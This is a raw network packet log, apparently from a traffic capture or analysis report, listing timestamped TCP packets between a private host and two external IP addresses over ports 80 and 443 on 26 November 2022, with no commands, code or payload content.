Nov 26, 2022 11:17:42.705106020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705116987 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.705125093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705142975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705162048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705163002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.705180883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705188990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.705199957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705221891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.705493927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705513000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705530882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705549002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705568075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705585957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705590963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.705591917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.705605030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705609083 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.705624104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705641031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705646992 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.705658913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705677986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705697060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.705720901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.705864906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705883980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705903053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705920935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705939054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705950975 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.705956936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705969095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.705974102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705992937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.705993891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.706012011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706031084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706036091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.706048965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706067085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.706235886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706255913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706274033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706291914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706305027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.706311941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706322908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.706331015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706347942 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.706347942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706366062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706384897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706389904 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.706403017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706420898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706423998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.706454992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706475019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706492901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706492901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.706521034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.706868887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706901073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706918955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706923962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.706938982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706955910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706974983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.706976891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.706993103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707006931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.707011938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707030058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707036972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.707047939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707066059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707101107 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.707125902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.707258940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707278967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707297087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707315922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707333088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707338095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.707350969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707360983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.707369089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707387924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707387924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.707406998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707423925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707428932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.707442045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707461119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707483053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.707509041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.707643986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707663059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707954884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707973003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.707992077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708009005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.708010912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708029985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708035946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.708046913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.708049059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708067894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708086014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708103895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708106041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.708122015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708131075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.708141088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708158970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708163977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.708175898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708194017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708195925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.708211899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708230972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708249092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708250999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.708266973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708272934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.708308935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.708349943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708368063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708386898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708405018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708422899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708434105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.708442926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708462954 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.708478928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.708751917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708770990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708787918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708806992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708820105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.708827972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708846092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708858967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.708864927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708883047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708899975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708904028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.708919048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708930016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.708935976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708954096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.708959103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.708972931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709019899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.709045887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709064007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709081888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709105968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709110022 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.709124088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709136009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.709141970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709161043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709166050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.709178925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709197044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709213972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.709214926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709244967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.709398985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709827900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709846020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709866047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709883928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709892035 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.709903002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709920883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709923983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.709939003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709956884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709964037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.709975004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.709992886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.710011005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.710012913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.710028887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.710041046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.710047960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.710067034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.710071087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.710083961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.710125923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.710130930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.710150003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.710167885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.710174084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.710186958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.710206032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.710211039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.710242033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.710505962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.710525036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.710542917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.710561037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.710580111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.710585117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.710598946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.710608959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.710617065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.710643053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.711177111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.711198092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.711216927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.711225986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.711236000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.711252928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.711256027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.711276054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.711293936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.711311102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.711314917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.711328983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.711344957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.711347103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.711364985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.711374044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.711384058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.711400986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.711419106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.711420059 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.711436987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.711450100 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.711452961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.711478949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.764036894 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:48.584722042 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:48.602168083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:48.602705002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:48.671801090 CET	49708	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:48.671866894 CET	443	49708	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:48.671957970 CET	49708	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:48.705622911 CET	49708	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:48.705667019 CET	443	49708	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:48.838479042 CET	443	49708	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:48.838587046 CET	49708	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:48.841722965 CET	49708	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:48.841743946 CET	443	49708	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:48.842149019 CET	443	49708	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:49.046935081 CET	443	49708	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:49.047365904 CET	49708	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:49.213272095 CET	49708	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:49.213295937 CET	443	49708	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:49.305254936 CET	443	49708	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:49.305440903 CET	443	49708	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:49.305536032 CET	49708	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:49.314826012 CET	49708	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:49.322513103 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:49.322592020 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:49.322695971 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:49.323067904 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:49.323107004 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:49.464999914 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:49.473263025 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:49.473315954 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.178149939 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.178217888 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.178265095 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.178334951 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.178411961 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.178471088 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.178493977 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.223561049 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.223630905 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.223707914 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.223778963 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.223825932 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.224226952 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.273255110 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.273319960 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.273473978 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.273473978 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.273504972 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.275866985 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.326673031 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.326733112 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.326828957 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.326879025 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.326919079 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.327337980 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.377625942 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.377696991 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.377849102 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.377895117 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.377926111 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.377955914 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.427411079 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.427469015 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.427583933 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.427583933 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.427664042 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.428141117 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.478193998 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.478261948 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.478363991 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.478363991 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.478403091 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.478461981 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.536775112 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.536806107 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.536892891 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.536940098 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.536971092 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.537339926 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.580624104 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.580662012 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.580790043 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.580790043 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.580843925 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.581091881 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.628272057 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.628314972 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.628412962 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.628467083 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.628501892 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.628561020 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.677772045 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.677818060 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.677973032 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.677973032 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.678024054 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.680654049 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.737925053 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.737965107 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.738051891 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.738095999 CET	443	49709	144.76.136.153	192.168.2.5
Nov 26, 2022 11:17:50.738126040 CET	49709	443	192.168.2.5	144.76.136.153
Nov 26, 2022 11:17:50.738611937 CET	49709	443	192.168.2.5	144.76.136.153
